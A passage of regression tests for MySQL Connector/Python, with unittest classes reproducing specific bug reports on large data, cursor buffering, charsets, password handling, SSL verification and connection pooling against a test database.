cur.execute("DROP TABLE IF EXISTS {0}".format(self.tbl))
create = ("CREATE TABLE {0} ("
"id INT PRIMARY KEY, "
"a LONGTEXT "
") ENGINE=Innodb DEFAULT CHARSET utf8".format(self.tbl))
cur.execute(create)
def tearDown(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
cur.execute("DROP TABLE IF EXISTS {0}".format(self.tbl))
cur.close()
cnx.close()
def _test_bigdata(self):
temp = 'a'*16777210
insert = "INSERT INTO {0} (a) VALUES ('{1}')".format(self.tbl, temp)
cur = self.cnx.cursor()
cur.execute(insert)
cur.execute("SELECT a FROM {0}".format(self.tbl))
res = cur.fetchall()
self.assertEqual(16777210, len(res[0][0]))
cur.execute("UPDATE {0} SET a = concat(a, 'a')".format(self.tbl))
cur.execute("SELECT a FROM {0}".format(self.tbl))
res = cur.fetchall()
self.assertEqual(16777211, len(res[0][0]))
cur.execute("UPDATE {0} SET a = concat(a, 'a')".format(self.tbl))
cur.execute("SELECT a FROM {0}".format(self.tbl))
res = cur.fetchall()
self.assertEqual(16777212, len(res[0][0]))
cur.execute("UPDATE {0} SET a = concat(a, 'a')".format(self.tbl))
cur.execute("SELECT a FROM {0}".format(self.tbl))
res = cur.fetchall()
self.assertEqual(16777213, len(res[0][0]))
cur.execute("UPDATE {0} SET a = concat(a, 'aaa')".format(self.tbl))
cur.execute("SELECT a FROM {0}".format(self.tbl))
res = cur.fetchall()
self.assertEqual(16777216, len(res[0][0]))
cur.close()
    @cnx_config(compress=True, connection_timeout=100)
@foreach_cnx()
def test_bigdata_compress(self):
self._test_bigdata()
@cnx_config(connection_timeout=100)
@foreach_cnx()
def test_bigdata_nocompress(self):
self._test_bigdata()
class BugOra20811802(tests.MySQLConnectorTests):
"""BUG#20811802: ISSUES WHILE USING BUFFERED=TRUE OPTION WITH CPY CEXT
"""
def setUp(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
self.tbl = 'Bug20811802'
cur.execute("DROP TABLE IF EXISTS {0}".format(self.tbl))
create = ("CREATE TABLE {0} (id INT, name VARCHAR(5), dept VARCHAR(5)) "
"DEFAULT CHARSET latin1".format(self.tbl))
cur.execute(create)
cur.close()
cnx.close()
def tearDown(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
cur.execute("DROP TABLE IF EXISTS {0}".format(self.tbl))
cur.close()
cnx.close()
@foreach_cnx()
def test_set(self):
cur = self.cnx.cursor()
sql = "INSERT INTO {0} VALUES(%s, %s, %s)".format(self.tbl)
data = [
(1, 'abc', 'cs'),
(2, 'def', 'is'),
(3, 'ghi', 'cs'),
(4, 'jkl', 'it'),
]
cur.executemany(sql, data)
cur.close()
cur = self.cnx.cursor(named_tuple=True, buffered=True)
cur.execute("SELECT * FROM {0}".format(self.tbl))
i = 0
for row in cur:
self.assertEqual((row.id, row.name, row.dept), data[i])
i += 1
cur.close()
cur = self.cnx.cursor(dictionary=True, buffered=True)
cur.execute("SELECT * FROM {0}".format(self.tbl))
i = 0
for row in cur:
self.assertEqual(row, dict(zip(('id', 'name', 'dept'), data[i])))
i += 1
cur = self.cnx.cursor(named_tuple=True, buffered=False)
cur.execute("SELECT * FROM {0}".format(self.tbl))
i = 0
for row in cur:
self.assertEqual((row.id, row.name, row.dept), data[i])
i += 1
cur.close()
cur = self.cnx.cursor(dictionary=True, buffered=False)
cur.execute("SELECT * FROM {0}".format(self.tbl))
i = 0
for row in cur:
self.assertEqual(row, dict(zip(('id', 'name', 'dept'), data[i])))
i += 1
class BugOra20834643(tests.MySQLConnectorTests):
"""BUG#20834643: ATTRIBUTE ERROR NOTICED WHILE TRYING TO PROMOTE SERVERS
"""
def setUp(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
self.tbl = 'Bug20834643'
cur.execute("DROP TABLE IF EXISTS {0}".format(self.tbl))
create = ("CREATE TABLE {0} (id INT, name VARCHAR(5), dept VARCHAR(5)) "
"DEFAULT CHARSET latin1".format(self.tbl))
cur.execute(create)
cur.close()
cnx.close()
def tearDown(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
cur.execute("DROP TABLE IF EXISTS {0}".format(self.tbl))
cur.close()
cnx.close()
@foreach_cnx()
def test_set(self):
cur = self.cnx.cursor()
sql = "INSERT INTO {0} VALUES(%s, %s, %s)".format(self.tbl)
data = [
(1, 'abc', 'cs'),
(2, 'def', 'is'),
(3, 'ghi', 'cs'),
(4, 'jkl', 'it'),
]
cur.executemany(sql, data)
cur.close()
cur = self.cnx.cursor(named_tuple=True)
cur.execute("SELECT * FROM {0}".format(self.tbl))
res = cur.fetchone()
self.assertEqual(data[0], (res.id, res.name, res.dept))
res = cur.fetchall()
exp = []
for row in res:
exp.append((row.id, row.name, row.dept))
self.assertEqual(exp, data[1:])
cur.close()
cur = self.cnx.cursor(named_tuple=True, buffered=True)
cur.execute("SELECT * FROM {0}".format(self.tbl))
res = cur.fetchone()
self.assertEqual(data[0], (res.id, res.name, res.dept))
res = cur.fetchall()
exp = []
for row in res:
exp.append((row.id, row.name, row.dept))
self.assertEqual(exp, data[1:])
cur.close()
cur = self.cnx.cursor(named_tuple=True, buffered=False)
cur.execute("SELECT * FROM {0}".format(self.tbl))
res = cur.fetchone()
self.assertEqual(data[0], (res.id, res.name, res.dept))
res = cur.fetchall()
exp = []
for row in res:
exp.append((row.id, row.name, row.dept))
self.assertEqual(exp, data[1:])
cur.close()
class BugOra20653441(tests.MySQLConnectorTests):
"""BUG#20653441: PYTHON CONNECTOR HANGS IF A QUERY IS KILLED (ERROR 1317)"""
def setUp(self):
self.table_name = 'Bug20653441'
self._setup()
def _setup(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cnx.cmd_query("DROP TABLE IF EXISTS {0}".format(self.table_name))
table = (
"CREATE TABLE {table} ("
" id INT UNSIGNED NOT NULL AUTO_INCREMENT,"
" c1 VARCHAR(255) DEFAULT '{default}',"
" PRIMARY KEY (id)"
")"
).format(table=self.table_name, default='a' * 255)
cnx.cmd_query(table)
stmt = "INSERT INTO {table} (id) VALUES {values}".format(
table=self.table_name,
values=','.join(['(NULL)'] * 1024)
)
cnx.cmd_query(stmt)
cnx.commit()
cnx.close()
def tearDown(self):
try:
cnx = connection.MySQLConnection(**tests.get_mysql_config())
cnx.cmd_query(
"DROP TABLE IF EXISTS {0}".format(self.table_name))
cnx.close()
except:
pass
@foreach_cnx()
def test_kill_query(self):
def kill(connection_id):
"""Kill query using separate connection"""
killer_cnx = connection.MySQLConnection(**tests.get_mysql_config())
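            # Give the worker a moment to start the long-running SELECT
            # before killing it from this second connection.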
time.sleep(1)
killer_cnx.cmd_query("KILL QUERY {0}".format(connection_id))
killer_cnx.close()
def sleepy_select(cnx):
"""Execute a SELECT statement which takes a while to complete"""
cur = cnx.cursor()
# Ugly query ahead!
stmt = "SELECT x1.*, x2.* from {table} as x1, {table} as x2".format(
table=self.table_name)
cur.execute(stmt)
# Save the error so we can check in the calling thread
cnx.test_error = None
try:
cur.fetchall()
except errors.Error as err:
cnx.test_error = err
cur.close()
worker = Thread(target=sleepy_select, args=[self.cnx])
killer = Thread(target=kill, args=[self.cnx.connection_id])
worker.start()
killer.start()
worker.join()
killer.join()
self.cnx.close()
self.assertTrue(isinstance(self.cnx.test_error, errors.DatabaseError))
self.assertEqual(str(self.cnx.test_error),
"1317 (70100): Query execution was interrupted")
class BugOra21535573(tests.MySQLConnectorTests):
"""BUG#21535573: SEGFAULT WHEN TRY TO SELECT GBK DATA WITH C-EXTENSION
"""
def tearDown(self):
cnx = connection.MySQLConnection(**tests.get_mysql_config())
for charset in ('gbk', 'sjis', 'big5'):
tablename = charset + 'test'
cnx.cmd_query("DROP TABLE IF EXISTS {0}".format(tablename))
cnx.close()
def _test_charset(self, charset, data):
config = tests.get_mysql_config()
config['charset'] = charset
config['use_unicode'] = True
self.cnx = self.cnx.__class__(**config)
tablename = charset + 'test'
cur = self.cnx.cursor()
cur.execute("DROP TABLE IF EXISTS {0}".format(tablename))
if PY2:
column = data.encode(charset)
else:
column = data
table = (
"CREATE TABLE {table} ("
" {col} INT AUTO_INCREMENT KEY, "
"c1 VARCHAR(40)"
") CHARACTER SET '{charset}'"
).format(table=tablename, charset=charset, col=column)
cur.execute(table)
self.cnx.commit()
cur.execute("TRUNCATE {0}".format(tablename))
self.cnx.commit()
insert = "INSERT INTO {0} (c1) VALUES (%s)".format(tablename)
cur.execute(insert, (data,))
self.cnx.commit()
cur.execute("SELECT * FROM {0}".format(tablename))
for row in cur:
self.assertEqual(data, row[1])
cur.close()
self.cnx.close()
@foreach_cnx()
def test_gbk(self):
self._test_charset('gbk', u'海豚')
@foreach_cnx()
def test_sjis(self):
self._test_charset('sjis', u'シイラ')
@foreach_cnx()
def test_big5(self):
self._test_charset('big5', u'皿')
class BugOra21536507(tests.MySQLConnectorTests):
"""BUG#21536507:C/PYTHON BEHAVIOR NOT PROPER WHEN RAISE_ON_WARNINGS=TRUE
"""
@cnx_config(raw=False, get_warnings=True, raise_on_warnings=True)
@foreach_cnx()
def test_with_raw(self):
cur = self.cnx.cursor()
drop_stmt = "DROP TABLE IF EXISTS unknown"
self.assertRaises(errors.DatabaseError, cur.execute, drop_stmt)
exp = [('Note', 1051, "Unknown table 'myconnpy.unknown'")]
res = cur.fetchwarnings()
self.assertEqual('Note', res[0][0])
self.assertEqual(1051, res[0][1])
self.assertTrue(res[0][2].startswith("Unknown table"))
select_stmt = "SELECT 'a'+'b'"
cur.execute(select_stmt)
self.assertRaises(errors.DatabaseError, cur.fetchall)
if os.name != 'nt':
exp = [
('Warning', 1292, "Truncated incorrect DOUBLE value: 'a'"),
('Warning', 1292, "Truncated incorrect DOUBLE value: 'b'"),
]
else:
exp = [
('Warning', 1292, "Truncated incorrect DOUBLE value: 'b'"),
('Warning', 1292, "Truncated incorrect DOUBLE value: 'a'"),
]
self.assertEqual(exp, cur.fetchwarnings())
try:
cur.close()
except errors.InternalError as exc:
self.fail("Closing cursor failed with: %s" % str(exc))
class BugOra21420633(tests.MySQLConnectorTests):
"""BUG#21420633: CEXTENSION CRASHES WHILE FETCHING LOTS OF NULL VALUES
"""
def setUp(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
self.tbl = 'Bug21420633'
cur.execute("DROP TABLE IF EXISTS {0}".format(self.tbl))
create = ("CREATE TABLE {0} (id INT, dept VARCHAR(5)) "
"DEFAULT CHARSET latin1".format(self.tbl))
cur.execute(create)
cur.close()
cnx.close()
def tearDown(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
cur.execute("DROP TABLE IF EXISTS {0}".format(self.tbl))
cur.close()
cnx.close()
@foreach_cnx()
def test_null(self):
cur = self.cnx.cursor()
sql = "INSERT INTO {0} VALUES(%s, %s)".format(self.tbl)
data = [(i, None) for i in range(10000)]
cur.executemany(sql, data)
cur.close()
cur = self.cnx.cursor(named_tuple=True)
cur.execute("SELECT * FROM {0}".format(self.tbl))
res = cur.fetchall()
cur.close()
class BugOra21492428(tests.MySQLConnectorTests):
"""BUG#21492428: CONNECT FAILS WHEN PASSWORD STARTS OR ENDS WITH SPACES
"""
def setUp(self):
config = tests.get_mysql_config()
self.cnx = connection.MySQLConnection(**config)
self.cursor = self.cnx.cursor()
if config['unix_socket'] and os.name != 'nt':
self.host = 'localhost'
else:
self.host = config['host']
grant = u"CREATE USER '{user}'@'{host}' IDENTIFIED BY '{password}'"
self._credentials = [
('ABCD', ' XYZ'),
('PQRS', ' 1 2 3 '),
('XYZ1', 'XYZ123 '),
('A B C D', ' ppppp '),
]
if self.cnx.get_server_version() > (5, 6):
self._credentials += [
(' PQRSWITHSPACE', ' 1 2 3 '),
('XYZ1WITHSPACE ', 'XYZ123 '),
(' S P A C E D ', ' ppppp '),
]
for user, password in self._credentials:
self.cursor.execute(grant.format(
user=user, host=self.host, password=password))
def tearDown(self):
for user, password in self._credentials:
self.cursor.execute(u"DROP USER '{user}'@'{host}'".format(
user=user, host=self.host))
def test_password_with_spaces(self):
config = tests.get_mysql_config()
for user, password in self._credentials:
config['user'] = user
config['password'] = password
config['database'] = None
try:
cnx = connection.MySQLConnection(**config)
except errors.ProgrammingError:
self.fail('Failed using password with spaces for user %s' % user)
else:
cnx.close()
class BugOra21476495(tests.MySQLConnectorTests):
"""Bug 21476495 - CHARSET VALUE REMAINS INVALID AFTER FAILED
SET_CHARSET_COLLATION() CALL
"""
def setUp(self):
config = tests.get_mysql_config()
self.cnx = connection.MySQLConnection(**config)
def test_bad_set_charset_number(self):
old_val = self.cnx._charset_id
self.assertRaises(mysql.connector.Error,
self.cnx.set_charset_collation, 19999)
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cursor = cnx.cursor(raw=True, buffered=True)
cursor.execute("SHOW VARIABLES LIKE 'character_set_connection'")
row = cursor.fetchone()
self.assertEqual(row[1], u"utf8mb4")
cursor.close()
self.assertEqual(self.cnx._charset_id, old_val)
class BugOra21477493(tests.MySQLConnectorTests):
"""Bug 21477493 - EXECUTEMANY() API WITH INSERT INTO .. SELECT STATEMENT
RETURNS INTERFACEERROR
"""
def setUp(self):
config = tests.get_mysql_config()
self.cnx = connection.MySQLConnection(**config)
cursor = self.cnx.cursor()
cursor.execute("DROP TABLE IF EXISTS fun1")
cursor.execute("CREATE TABLE fun1(a CHAR(50), b INT)")
data=[('A',1),('B',2)]
cursor.executemany("INSERT INTO fun1 (a, b) VALUES (%s, %s)",data)
cursor.close()
def tearDown(self):
cursor = self.cnx.cursor()
cursor.execute("DROP TABLE IF EXISTS fun1")
cursor.close()
def test_insert_into_select_type1(self):
data = [('A',1),('B',2)]
cursor = self.cnx.cursor()
cursor.executemany("INSERT INTO fun1 SELECT CONCAT('VALUES', %s), "
"b + %s FROM fun1", data)
cursor.close()
cursor = self.cnx.cursor()
cursor.execute("SELECT * FROM fun1")
self.assertEqual(8, len(cursor.fetchall()))
def test_insert_into_select_type2(self):
data = [('A',1),('B',2)]
cursor = self.cnx.cursor()
cursor.executemany("INSERT INTO fun1 SELECT CONCAT('VALUES(ab, cd)',"
"%s), b + %s FROM fun1", data)
cursor.close()
cursor = self.cnx.cursor()
cursor.execute("SELECT * FROM fun1")
self.assertEqual(8, len(cursor.fetchall()))
def test_insert_into_select_type3(self):
config = tests.get_mysql_config()
data = [('A',1),('B',2)]
cursor = self.cnx.cursor()
cursor.executemany("INSERT INTO `{0}`.`fun1` SELECT CONCAT('"
"VALUES(ab, cd)', %s), b + %s FROM fun1"
"".format(config["database"]), data)
cursor.close()
cursor = self.cnx.cursor()
cursor.execute("SELECT * FROM fun1")
self.assertEqual(8, len(cursor.fetchall()))
class BugOra21492815(tests.MySQLConnectorTests):
"""BUG#21492815: CALLPROC() HANGS WHEN CONSUME_RESULTS=TRUE
"""
def setUp(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
self.proc1 = 'Bug20834643'
self.proc2 = 'Bug20834643_1'
cur.execute("DROP PROCEDURE IF EXISTS {0}".format(self.proc1))
create = ("CREATE PROCEDURE {0}() BEGIN SELECT 1234; "
"END".format(self.proc1))
cur.execute(create)
cur.execute("DROP PROCEDURE IF EXISTS {0}".format(self.proc2))
create = ("CREATE PROCEDURE {0}() BEGIN SELECT 9876; "
"SELECT CONCAT('','abcd'); END".format(self.proc2))
cur.execute(create)
cur.close()
cnx.close()
def tearDown(self):
config = tests.get_mysql_config()
cnx = connection.MySQLConnection(**config)
cur = cnx.cursor()
cur.execute("DROP PROCEDURE IF EXISTS {0}".format(self.proc1))
cur.execute("DROP PROCEDURE IF EXISTS {0}".format(self.proc2))
cur.close()
cnx.close()
@cnx_config(consume_results=True, raw=True)
@foreach_cnx()
def test_set_raw(self):
cur = self.cnx.cursor()
cur.callproc(self.proc1)
self.assertEqual((bytearray(b'1234'),),
next(cur.stored_results()).fetchone())
cur.callproc(self.proc2)
exp = [[(bytearray(b'9876'),)], [(bytearray(b'abcd'),)]]
results = []
for result in cur.stored_results():
results.append(result.fetchall())
self.assertEqual(exp, results)
cur.close()
@cnx_config(consume_results=True, raw=False)
@foreach_cnx()
def test_set(self):
cur = self.cnx.cursor()
cur.callproc(self.proc1)
self.assertEqual((1234,),
next(cur.stored_results()).fetchone())
cur.callproc(self.proc2)
exp = [[(9876,)], [('abcd',)]]
results = []
for result in cur.stored_results():
results.append(result.fetchall())
self.assertEqual(exp, results)
cur.close()
@unittest.skipIf(not CMySQLConnection, ERR_NO_CEXT)
class BugOra21656282(tests.MySQLConnectorTests):
"""BUG#21656282: CONNECT FAILURE WITH C-EXT WHEN PASSWORD CONTAINS UNICODE
CHARACTER
"""
def setUp(self):
config = tests.get_mysql_config()
self.cnx = CMySQLConnection(**config)
self.host = '127.0.0.1' if config['unix_socket'] and os.name != 'nt' \
else config['host']
self.user = 'unicode_user'
self.password = u'步'
# Use utf8mb4 character set
self.cnx.cmd_query("SET character_set_server='utf8mb4'")
# Drop user if exists
self._drop_user(self.host, self.user)
# Create the user with unicode password
create_user = (u"CREATE USER '{user}'@'{host}' IDENTIFIED BY "
u"'{password}'")
self.cnx.cmd_query(create_user.format(user=self.user, host=self.host,
password=self.password))
# Grant all to new user on database
grant = "GRANT ALL ON {database}.* TO '{user}'@'{host}'"
self.cnx.cmd_query(grant.format(database=config['database'],
user=self.user, host=self.host))
def tearDown(self):
self._drop_user(self.host, self.user)
def _drop_user(self, host, user):
try:
drop_user = "DROP USER '{user}'@'{host}'"
self.cnx.cmd_query(drop_user.format(user=user, host=host))
except errors.DatabaseError:
# It's OK when drop user fails
pass
def test_unicode_password(self):
config = tests.get_mysql_config()
config.pop('unix_socket')
config['user'] = self.user
config['password'] = self.password
try:
cnx = CMySQLConnection(**config)
except Exception as err:
self.fail('Failed using password with unicode characters: '
'e->{} t->{}'.format(err, type(err)))
else:
cnx.close()
class BugOra21530841(tests.MySQLConnectorTests):
"""BUG#21530841: SELECT FAILS WITH ILLEGAL RESULT SET ERROR WHEN COLUMN
COUNT IN RESULT > 4096
"""
def setUp(self):
config = tests.get_mysql_config()
self.cnx = connection.MySQLConnection(**config)
self.tbl = "Bug21530841"
self.cnx.cmd_query("DROP TABLE IF EXISTS {0}".format(self.tbl))
def tearDown(self):
self.cnx.cmd_query("DROP TABLE IF EXISTS {0}".format(self.tbl))
self.cnx.close()
def test_big_column_count(self):
cur = self.cnx.cursor(raw=False, buffered=False)
# Create table with 512 Columns
table = "CREATE TABLE {0} ({1})".format(self.tbl,
", ".join(["c{0} INT".format(idx) for idx in range(512)]))
cur.execute(table)
# Insert 1 record
cur.execute("INSERT INTO {0}(c1) values (1) ".format(self.tbl))
self.cnx.commit()
# Select from 10 tables
query = "SELECT * FROM {0} WHERE a1.c1 > 0".format(
", ".join(["{0} a{1}".format(self.tbl, idx) for idx in range(10)]))
cur.execute(query)
cur.fetchone()
cur.close()
@unittest.skipIf(sys.version_info < (2, 7, 9),
"Python 2.7.9+ is required for SSL")
class BugOra25397650(tests.MySQLConnectorTests):
"""BUG#25397650: CERTIFICATE VALIDITY NOT VERIFIED
"""
def setUp(self):
self.config = tests.get_mysql_config().copy()
self.config.pop('unix_socket')
self.config['host'] = 'localhost'
self.ca = os.path.abspath(
os.path.join(tests.SSL_DIR, 'tests_CA_cert.pem'))
self.ca_1 = os.path.abspath(
os.path.join(tests.SSL_DIR, 'tests_CA_cert_1.pem'))
def _verify_cert(self, config):
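# With a non-matching CA the connection must fail only when
# ssl_verify_cert is True; with the correct CA it must succeed
# regardless of the ssl_verify_cert setting.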
# Test with a bad CA
config['ssl_ca'] = self.ca_1
config['ssl_verify_cert'] = True
self.assertRaises(errors.InterfaceError,
mysql.connector.connect, **config)
config['ssl_verify_cert'] = False
mysql.connector.connect(**config)
# Test with the correct CA
config['ssl_ca'] = self.ca
config['ssl_verify_cert'] = True
mysql.connector.connect(**config)
config['ssl_verify_cert'] = False
mysql.connector.connect(**config)
def test_pure_verify_server_certifcate(self):
config = self.config.copy()
config['use_pure'] = True
self._verify_cert(config)
@unittest.skipIf(not CMySQLConnection, ERR_NO_CEXT)
def test_cext_verify_server_certifcate(self):
config = self.config.copy()
config['use_pure'] = False
self._verify_cert(config)
@unittest.skipIf(tests.MYSQL_VERSION < (5, 6, 39), "skip in older server")
@unittest.skipIf(not CMySQLConnection, ERR_NO_CEXT)
class Bug28133321(tests.MySQLConnectorTests):
"""BUG#28133321: FIX INCORRECT COLUMNS NAMES REPRESENTING AGGREGATE
FUNCTIONS
"""
tbl = "BUG28133321"
def setUp(self):
create_table = ("CREATE TABLE {} ("
" dish_id INT(11) UNSIGNED AUTO_INCREMENT UNIQUE KEY,"
" category TEXT,"
" dish_name TEXT,"
" price FLOAT,"
" servings INT,"
" order_time TIME) CHARACTER SET utf8"
" COLLATE utf8_general_ci")
config = tests.get_mysql_config()
cnx = CMySQLConnection(**config)
try:
cnx.cmd_query("DROP TABLE IF EXISTS {0}".format(self.tbl))
except:
pass
cnx.cmd_query(create_table.format(self.tbl))
cur = cnx.cursor(dictionary=True)
insert_stmt = ('INSERT INTO {} ('
' category, dish_name, price, servings, order_time'
') VALUES ("{{}}", "{{}}", {{}}, {{}}, "{{}}")'
).format(self.tbl)
values = [("dinner", "lassanya", 10.53, "2", "00:10"),
("dinner", "hamburger", 9.35, "1", "00:15"),
("dinner", "hamburger whit fries", 10.99, "2", "00:20"),
("dinner", "Pizza", 9.99, "4", "00:30"),
("dessert", "cheescake", 4.95, "1", "00:05"),
("dessert", "cheescake special", 5.95, "2", "00:05")]
for value in values:
cur.execute(insert_stmt.format(*value))
cnx.close()
def tearDown(self):
config = tests.get_mysql_config()
cnx = CMySQLConnection(**config)
try:
cnx.cmd_query("DROP TABLE IF EXISTS {0}".format(self.tbl))
except:
pass
cnx.close()
def test_columns_name_are_not_bytearray(self):
sql_statement = ["SELECT",
" dish_id,",
" category,",
" JSON_OBJECTAGG(category, dish_name) as special,",
" JSON_ARRAYAGG(dish_name) as dishes,",
" GROUP_CONCAT(dish_name) as dishes2,",
" price,",
" servings,",
" ROUND(AVG(price)) AS round_avg_price,",
" AVG(price) AS avg_price,",
" MIN(price) AS min_price,",
" MAX(price) AS max_price,",
" MAX(order_time) AS preparation_time,",
" STD(servings) as deviation,",
" SUM(price) AS sum,",
" VARIANCE(price) AS var,",
" COUNT(DISTINCT servings) AS cd_servings,",
" COUNT(servings) AS c_servings ",
"FROM {} ",
"GROUP BY category"]
# Remove JSON functions when testing against server versions < 5.7.22
# JSON_OBJECTAGG and JSON_ARRAYAGG were introduced in 5.7.22
if tests.MYSQL_VERSION < (5, 7, 22):
sql_statement.pop(3)
sql_statement.pop(3)
sql_statement = "".join(sql_statement)
config = tests.get_mysql_config()
cnx = CMySQLConnection(**config)
cur = cnx.cursor(dictionary=True)
cur.execute(sql_statement.format(self.tbl))
rows = cur.fetchall()
col_names = [x[0] for x in cur.description]
for row in rows:
for col, val in row.items():
self.assertTrue(isinstance(col, STRING_TYPES),
"The columns name {} is not a string type"
"".format(col))
self.assertFalse(isinstance(col, (bytearray)),
"The columns name {} is a bytearray type"
"".format(col))
self.assertFalse(isinstance(val, (bytearray)),
"The value {} of column {} is a bytearray type"
"".format(val, col))
for col_name in col_names:
self.assertTrue(isinstance(col_name, STRING_TYPES),
"The columns name {} is not a string type"
"".format(col_name))
self.assertFalse(isinstance(col_name, (bytearray)),
"The columns name {} is a bytearray type"
"".format(col_name))
class BugOra21947091(tests.MySQLConnectorTests):
"""BUG#21947091: """
def setUp(self):
self.config = tests.get_mysql_config()
self.config.pop('unix_socket')
self.server = tests.MYSQL_SERVERS[0]
def _disable_ssl(self):
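# Restart the server with SSL support disabled.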
self.server.stop()
self.server.wait_down()
self.server.start(ssl_ca='', ssl_cert='', ssl_key='', ssl=0)
self.server.wait_up()
time.sleep(1)
def _enable_ssl(self):
self.server.stop()
self.server.wait_down()
self.server.start()
self.server.wait_up()
time.sleep(1)
def _verify_ssl(self, cnx, available=True):
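# Inspect the Ssl_version status variable: a non-empty value means
# the connection uses SSL, an empty value means it does not.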
cur = cnx.cursor()
cur.execute("SHOW STATUS LIKE 'Ssl_version'")
result = cur.fetchall()[0]
if available:
self.assertNotEqual(result[1], '')
else:
self.assertEqual(result[1], '')
def test_ssl_disabled_pure(self):
self.config['use_pure'] = True
self._test_ssl_modes()
@unittest.skipIf(not CMySQLConnection, ERR_NO_CEXT)
def test_ssl_disabled_cext(self):
self.config['use_pure'] = False
self._test_ssl_modes()
def _test_ssl_modes(self):
config = self.config.copy()
# With SSL on server
# default
cnx = mysql.connector.connect(**config)
self._verify_ssl(cnx)
# disabled
config['ssl_disabled'] = True
cnx = mysql.connector.connect(**config)
self._verify_ssl(cnx, False)
self._disable_ssl()
config = self.config.copy()
config['ssl_ca'] = tests.SSL_CA
# Without SSL on server
try:
# default
cnx = mysql.connector.connect(**config)
self._verify_ssl(cnx, False)
# disabled
config['ssl_disabled'] = True
cnx = mysql.connector.connect(**config)
self._verify_ssl(cnx, False)
finally:
self._enable_ssl()
class BugOra25589496(tests.MySQLConnectorTests):
"""BUG#25589496: COMMITS RELATED TO "BUG22529828" BROKE BINARY DATA
HANDLING FOR PYTHON 2.7
"""
def setUp(self):
config = tests.get_mysql_config()
self.cnx = connection.MySQLConnection(**config)
self.tbl = "Bug25589496"
self.cnx.cmd_query("DROP TABLE IF EXISTS {0}".format(self.tbl))
def tearDown(self):
self.cnx.cmd_query("DROP TABLE IF EXISTS {0}".format(self.tbl))
self.cnx.close()
def test_insert_binary(self):
table = """
CREATE TABLE {0} (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT PRIMARY KEY,
`section` VARCHAR(50) NOT NULL,
`pickled` LONGBLOB NOT NULL
)
""".format(self.tbl)
cursor = self.cnx.cursor()
cursor.execute(table)
pickled = pickle.dumps({'a': 'b'}, pickle.HIGHEST_PROTOCOL)
add_row_q = "INSERT INTO {0} (section, pickled) " \
"VALUES (%(section)s, %(pickled)s)".format(self.tbl)
cursor.execute(add_row_q, {'section': 'foo',
'pickled': pickled})
self.cnx.commit()
self.assertEqual(1, cursor.lastrowid)
cursor.close()
class BugOra25383644(tests.MySQLConnectorTests):
"""BUG#25383644: LOST SERVER CONNECTION LEAKS POOLED CONNECTIONS
"""
def setUp(self):
self.sql = "SELECT * FROM dummy"
self.mysql_server = tests.MYSQL_SERVERS[0]
def run_test(self, cnxpool):
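# Take a connection from the pool, stop the server so the query
# fails, then close cursor and connection. With pool_size=1 a leaked
# connection would make the second get_connection() call fail.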
i = 2
while i > 0:
cnx = cnxpool.get_connection()
cur = cnx.cursor()
try:
self.mysql_server.stop()
self.mysql_server.wait_down()
cur.execute(self.sql)
except (mysql.connector.errors.OperationalError,
mysql.connector.errors.ProgrammingError,
mysql.connector.errors.DatabaseError):
try:
cur.close()
cnx.close()
except mysql.connector.errors.OperationalError:
pass
finally:
i -= 1
if not self.mysql_server.check_running():
self.mysql_server.start()
self.mysql_server.wait_up()
def test_pool_exhaustion_pure(self):
config = tests.get_mysql_config()
config["pool_size"] = 1
config["use_pure"] = True
config['pool_name'] = 'BugOra25383644-pure'
cnxpool = pooling.MySQLConnectionPool(**config)
self.run_test(cnxpool)
@unittest.skipIf(not CMySQLConnection, ERR_NO_CEXT)
def test_pool_exhaustion_cext(self):
config = tests.get_mysql_config()
config["pool_size"] = 1
config["use_pure"] = False
config['pool_name'] = 'BugOra25383644-c-ext'
cnxpool = pooling.MySQLConnectionPool(**config)
self.run_test(cnxpool)
class BugOra25558885(tests.MySQLConnectorTests):
"""BUG#25558885: ERROR 2013 (LOST CONNECTION TO MYSQL SERVER) USING C
EXTENSIONS
"""
def setUp(self):
pass
def _long_query(self, config, cursor_class):
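# Run a query that sleeps for 15 seconds using the given cursor
# class; the reported bug caused the C extension to lose the
# connection (error 2013) on such long-running queries.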
db_conn = mysql.connector.connect(**config)
cur = db_conn.cursor(cursor_class=cursor_class)
cur.execute("select sleep(15)")
cur.close()
db_conn.disconnect()
@unittest.skipIf(not CMySQLConnection, ERR_NO_CEXT)
def test_cext_cnx(self):
config = tests.get_mysql_config()
config["use_pure"] = False
del config["connection_timeout"]
cursor_class = mysql.connector.cursor_cext.CMySQLCursorBufferedRaw
self._long_query(config, cursor_class)
def test_pure_cnx(self):
config = tests.get_mysql_config()
config["use_pure"] = True
del config["connection_timeout"]
cursor_class = mysql.connector.cursor.MySQLCursorBufferedRaw
self._long_query(config, cursor_class)
class BugOra22564149(tests.MySQLConnectorTests):
"""BUG#22564149: CMD_QUERY_ITER ERRONEOUSLY CALLS ".ENCODE('UTF8')" ON
BYTESTRINGS
"""
def setUp(self):
config = tests.get_mysql_config()
self.tbl = "BugOra22564149"
self.cnx = connection.MySQLConnection(**config)
self.cnx.cmd_query("DROP TABLE IF EXISTS {0}".format(self.tbl))
self.cnx.cmd_query("CREATE TABLE {0} (id INT, name VARCHAR(50))"
"".format(self.tbl))
def tearDown(self):
self.cnx.cmd_query("DROP TABLE IF EXISTS {0}".format(self.tbl))
self.cnx.close()
def test_cmd_query_iter(self):
stmt = (u"SELECT 1; INSERT INTO {0} VALUES (1, 'João'),(2, 'André'); "
u"SELECT 3")
results = []
for result in self.cnx.cmd_query_iter(
stmt.format(self.tbl).encode("utf-8")):
results.append(result)
if "columns" in result:
results.append(self.cnx.get_rows())
class BugOra24659561(tests.MySQLConnectorTests):
"""BUG#24659561: LOOKUPERROR: UNKNOWN ENCODING: UTF8MB4
"""
def setUp(self):
config = tests.get_mysql_config()
config["charset"] = "utf8mb4"
